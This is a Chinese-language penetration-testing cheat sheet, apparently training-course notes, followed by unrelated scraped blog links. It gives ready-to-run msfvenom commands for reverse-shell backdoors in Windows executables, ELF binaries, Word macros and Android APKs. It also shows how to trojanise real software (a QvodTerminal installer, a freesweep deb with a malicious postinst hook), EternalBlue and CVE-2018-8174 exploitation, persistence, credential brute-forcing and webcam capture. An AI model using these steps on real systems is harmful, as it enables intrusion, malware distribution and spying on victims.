1.fscan(内网扫描工具)

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)

2.netdiscover(网络扫描工具)

netdiscover -i eth0 -r 192.168.1.1/24  主动探测
netdiscover -p  被动探测  网卡混杂模式
优点:可以查看IP地址和对应得物理网卡

3.fping(网络小工具)

fping -ag 192.168.1.0/24 > fping.txt 显示存活主机nmtui(网络配置命令)

4.nmap(端口扫描工具)

nmap -sn 192.168.1.0/24(扫网段)
nmap -sS 192.168.1.1 (半连接扫描)
nmap -O 192.168.1.1 (操作系统扫描)
nmap -sV -T4 -O -F --version-light(快速扫描加强模式)
nmap 192.168.1.0/24 -p1-1024 --script=ipidseq.nse >a.txt(扫描哪些主机可以作为僵尸主机)
nmap 192.168.1.70 -sI (僵尸IP)

僵尸扫描实施环境:
足够闲置的系统(僵尸机)
僵尸系统必须使用递增的IPID
可伪造源地址

5.常看高危端口及关闭

lsof -i :22(查端口被谁使用)
ps -aux | grep 666 (查看进程文件路径)【注:666是PID】
systemctl stop ssh (关闭高危端口)
kill  -9 666

6.制作Windows恶意软件获取Shell

msfdb run(msf打开并打开数据库)
msfvenom是msfpayload,nsfencode的结合体

(1)生成一个后门程序(使用一个编码器)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

(2)可以生成另一个后门程序(使用两个编码器)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/shell1.exe

(3)进行监听

msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(4)如果访问不了,可能apache没开启

systemctl start apache2

或者文件名有问题,如有空格

(5)另一台电脑下载运行

http://192.168.91.129/shell.exe
http://192.168.91.129/shell1.exe

(6)提权

getsystem
getuid
sysinfo(查看系统信息)
show_mount(查看分区)
run post
run post/windows/gather/enum_chrome(查看浏览器缓存)
run post/windows/gather/enum_domain(查看域控)
edit(创建文件)pwd(目标机的) lpwd(本机的)
download root.txt /root/  (下载到当前目录)

7.实战-给真正的快播软件加上后门

(1)上传绿色安全软件到kali
(2)使用编码器制作一个木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe

(3)kali进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(4)受害机进行运行
(5)上线后,进行提权
`

getuid  getsystem`

8.实战-制作Linux恶意软件获取shell

msfvenom -a x86 --platform linux -p linux/meterpreter/bind_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -f elf -o  /var/www/html/xuegod
set payload linux/x64/shell/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run
background(保存到后台)
show options (查看)
./xuegod(受害机运行)

9.实战-制作恶意deb软件包来触发后门

(1)下载一个游戏软件

apt --download-only install freesweep(下载不安装)
自动下载到 /var/cache/apt/archives

(2)移动到root目录

mv freesweep.deb ~

(3)解压软件包到free目录

dpkg -x freesweep.deb free

(4)制作后门

msfvenom -a x86 --platform linux -p linux/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -f elf -o  /root/free/usr/games/freesweep_sources

(5)创建文件目录并切换到目录下

mkdir /root/free/DEBIAN && cd /root/free/DEBIAN

(6)创建软件包的信息文件

tee /root/free/DEBIAN/control << "EOF"tee /root/free/DEBIAN/control << 'EOF'
#<<'EOF'表示开始
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game,where one tries to find all the mines without igniting any,based on hints given by the computer.Unlike most implementations of this game,Freesweep works in any visual text display -in Linux console,in an xterm,and in most text-based terminals currently in use
EOF
#第二个EOF表示结束

(7)创建deb软件包安装脚本后门

tee /root/free/DEBIAN/postinst << 'EOF'
sudo chomd 755 /usr/games/freesweep_scores
sudo /usr/games/freesweep_scores &
EOF

(8)给脚本执行权限

chmod +775 /root/free/DEBIAN/postinst

(9)构建新的deb安装包

dpkg-deb --build /root/free/

(10)开启handler监听在linux安装该软件包

use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(11)安装与卸载

dpkg -i free.deb进行安装
#dpkg -r freesweap可以进行卸载

10.SMB ms17-010的利用

(1)meterpreter

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.91.129
run
或者
shell
set payload windows/x64/shell/reverse_tcp
run
sessions -k 11(干掉)

(2)windows植入后门

use exploit/windows/local/persistence
set STARTUP SYSTEM
set DELAY 5
run
验证
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run 重复
exit  然后 run

11.实战-利用0DAY漏洞获取shell

(1)使用Xshell上传CVE-2018-8174的EXP到Kali

https://github.com/iBearcat/CVE-2018-8174_EXP(下载地址)

(2)解压 unzip CVE-2018-8174_EXP-master.zip
(3)生成恶意html文件

python CVE-2018-8174.py -u http://192.168.1.56/exploit.html -o hack.rtf -i 192.168.1.56 -p 4444

(4)将文件复制到apache根目录

cp exploit.html /var/www/html

(5)开启apache服务

systemctl start apache2
cd /var/www/html

(6)打开新的控制页面开启监听

msfdb run
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(7)打开win7IE浏览器

http://192.168.1.56/exploit.html (Kali拿到了shell)
whoami

12.基于java环境的漏洞利用获取shell(现在客户端安装jre-7u17)

(1)搭建Java环境,上传jre到win7或XP操作系统执行
(2)使用java模块getshell,开启监听

use exploit/multi/browser/java_jre17_driver_manager
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(3)运行会生成一个地址,在win7运行,接受风险运行
(4)kali拿到权限

sessions -i 3 (拿到权限)查看 getuid
注:如果出现这个错误提示,说明4444端口被占用
查看占用4444端口的进行ID
lsof -i:4444
然后将该进程杀死
kill -9 1945

13.利用宏感染word文档获取shell

(1)前提是安装有word
(2)生成一个恶意代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f vba-exe

(3)WIN7打开一个word文档,视图,点击宏文档,改为文档1,创建,复制msf代码粘贴到WIN7中,起名shark,点击启用宏的word文档,放在桌面上
(4)文档内容中需要粘贴payload代码,改为白字
(5)kali进行监听

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(6)win7打开word文档,需要启用宏
(7)kali拿到权限

14.安装客户端渗透

(1)通过MSF生成一个apk的后门应用

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.91.129 LPOST=4444 R > xuegod.apk

(2)访问下载

http://192.168.91.129/xuegod.apk

(3)win7打开模拟器,安装apk
(4)Kali进行监听

set payload android/meterpreter/reverse_tcp
set LHOST 192.168.91.129
set LPOST 4444
run

(5)win7运行
(6)kali拿到权限

15.将后门注入隐藏游戏APP中

(1)首先需要禁用ipv6
禁用ipv6

echo "net.ipv6.conf.eth0.disable_ipv6=1">>/etc/sysctl.conf
sysctl -p
ifconfig

(2)安装Evil-Droid工具,上传master到kali,cd进程序,改evil-droid
set num 40 google改为baidu set num 649 -fa删除 -fs之前
(3)增加执行权限

chmod +x Evil-Droid

(4)配置Evil-Droid-master

cd/Evil-Droid-master/tools
rm -fr apktool.jar
rz
ls apktool.jar doc.txt
./evil-droid
安装好前面都默认选择,payload选择android/meterpreter/reverse_tcp

(5)选择植入后门的apk
(6)生成apk文件证书,记住地址
(7)开启监听

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.185
run
systemctl start apache2

(8)win7去下载安装

http://192.168.43.185/evilapk.apk

(9)模拟器安装运行
(10)kali获取权限 webcam_list 获取摄像头

webcam_list
webcam_snap -i 1

注:客户端签名失败处理

apt-get install openjdk-11-jdk-headless -y

【学神IT教育渗透第一部分】相关推荐

  1. 我国职业教育的第一届本科生,毕业了!

    在6月的高校毕业季中,有一个高校的毕业仪式具有重要意义--南京工业职业技术大学2022届的903名"专升本"毕业生,他们不仅是拿到了自己的学士学位证书,而且还成为了我国职业教育的第 ...

  2. [渝粤教育] 山东第一医科大学 健康教育与健康促进 参考 资料

    教育 -健康教育与健康促进-章节资料考试资料-山东第一医科大学[] 第一讲测验 1.[单选题]健康教育学是一门以什么为对象的科学和艺术? A.健康相关行为 B.健康 C.疾病 D.环境 E.教育 参考 ...

  3. php安全新闻早八点-高级持续渗透-第一季关于后门

    转自:https://micropoor.blogspot.hk/2017/12/php.html 当我们接到某个项目的时候,它已经是被入侵了.甚至已经被脱库,或残留后门等持续攻击洗库. 后渗透攻击者 ...

  4. Java在线教育项目 第一天项目介绍和工程搭建

    第一章 项目介绍和工程搭建 学习目标 熟悉移动端应用系统的架构设计 熟悉大型软件系统设计中的各种图形结构 熟悉数据库分库分表设计技巧 熟悉Spring boot2.0+JavaConfig项目封装配置 ...

  5. 华信IT教育201611第一篇博客

    华信本周课堂收获与感悟 学员信息:杨子萌,男,19周岁,南华大学软件工程系. 作为一个几乎没有基础的大二学生,即将面临大学毕业而我大一却没有很用心的读书与学习,感觉自己特别需要获得尽快的提高,在学长的 ...

  6. 封神台(尤里的复仇Ⅱ 回归)渗透第一步 信息收集1

    前言 解题过程 前言 做这道题的时候,我的心情真是跌宕起伏..为什么这么说,且听我娓娓道来. 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了 ...

  7. 解析第一高中教育首份成绩单:营利双增,轻资产模式成“杀手锏”

    文|螳螂财经(TanglangFin) 作者| 青月 3月12日,专注于学历高中办学.高考补习全日制学校的民办教育集团-第一高中教育在纽交所挂牌上市.然而,开盘即破发,上市首日收盘股价共跌去12%,时 ...

  8. 传智教育1月12日在深交所成功挂牌上市,教育行业A股IPO第一股今诞生!

    今日(1月12日),国内IT职业培训行业头部企业--江苏传智播客教育科技股份有限公司(以下简称"传智教育"或"公司")正式在深交所中小板挂牌上市,股票简称&qu ...

  9. 渗透测试第一弹:信息刺探

    渗透第一弹刺探信息:freebuf 1,分析目标网站内容及功能 (1) 首先确定网站采用何种语言编写.或者是否有混用的情况.此处可以通过查看网站源文件,观察网站链接,捕获提交请求等方式获取. (2)  ...

  10. 计算机病毒渗透法制教育,法制教育在英语教学中随时、适时和反复渗透

    法制教育在英语教学中随时.适时和反复渗透 时间: 2013-11-25 栏目: 法制教育在英语教学中随时.适时和反复渗透 法制教育在英语教学中随时.适时和反复渗透 唐红枚 [摘要]中职英语教材不统一, ...

最新文章

  1. 广东安网2016:重拳挥出 打造安宁互联网环境
  2. C++primer :const限定符
  3. Properties作为Map集合的特有方法
  4. 分形——数学与艺术结合的明珠
  5. java万年历JFrame_Java Gui万年历
  6. 全网首发!Java高级程序员面试集合
  7. 双通道14位、500 MSPS采样率的AD9684 高速并行LVDS ADC接口介绍
  8. 数据可视化(一):matplotlib
  9. pymysql dataframe,DataFrame constructor not properly called
  10. SQLSERVER导入excel表格时,表中数据超过65536行
  11. 非科班出身程序员,如何超越科班程序员?
  12. 灰狼算法优化LSTM超参数-神经元个数-dropout-batch_size
  13. 通过java实现微信公众号发送微信消息
  14. Codeforces Round #787 (Div. 3)
  15. Python+selenium 实现自动投稿、自动发布哔哩哔哩B站短视频实例演示
  16. win10 1903 笔记本开热点出现蓝屏问题
  17. XV6源码解读:安装与编译
  18. CAD日照分析教程:CAD软件中如何擦除阴影?
  19. DS||dfs and bfs
  20. 防火墙和iptables

热门文章

  1. 手机电脑Mac地址修改方法
  2. 树突状细胞(DC细胞)特征及应用进展综述
  3. 线程同步作业(一):Lock,monitor
  4. spring boot整合微信支付
  5. LLVM 编译器学习笔记之三 -- TableGen语言编写*.td文件
  6. 阿里云oss使用cdn,节省oss下行流量
  7. python判断正数和负数教案_(完整版)正数和负数教学设计
  8. oracle认证考试指南全册,OCP认证考试指南全册Oracle Database10g
  9. hdu1814 暴力
  10. cout, endl的使用